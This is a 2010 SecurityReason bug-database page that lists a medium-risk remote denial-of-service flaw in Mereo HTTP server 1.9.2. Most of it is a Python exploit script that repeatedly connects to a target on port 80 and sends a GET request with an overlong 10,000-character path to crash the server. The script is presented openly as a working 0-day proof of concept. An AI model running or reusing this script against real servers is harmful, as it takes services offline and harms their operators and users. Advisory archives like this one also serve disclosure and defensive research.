SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

Mereo HTTP server 1.9.2 denial of service vulnerability


Arrow  WLB : WLB-2010090007  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-09-01
Arrow  Credit          : CwG GeNiuS
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2010-09-01] Started

Arrow  Affected software :  Mereo HTTP server 1.9.2



Arrow  Text :  

#!/usr/bin/python

###########################################################################

#
# Title: Mereo v1.9.2 Remote HTTP Server DoS (0day)
# By: CwG GeNiuS
# Email: cwggenius [at] gmail [dot] com
# Tested: XPSP3
# Download: http://www.ohloh.net/p/mereo
#
###########################################################################
#


import socket, sys

payload ="GET /";
payload+="X" * 10000;
payload+=" HTTP/1.1\r\n\r\n";
count = 1;

try:
while (count < 100):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("[*] Connecting to httpdx server.");
s.connect((sys.argv[1], 80));
print ("\n[*] Sending command.\n");
s.send(payload);
s.close();
count = count+1;
print count;
except:
print "Successfully Crashed!";



Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.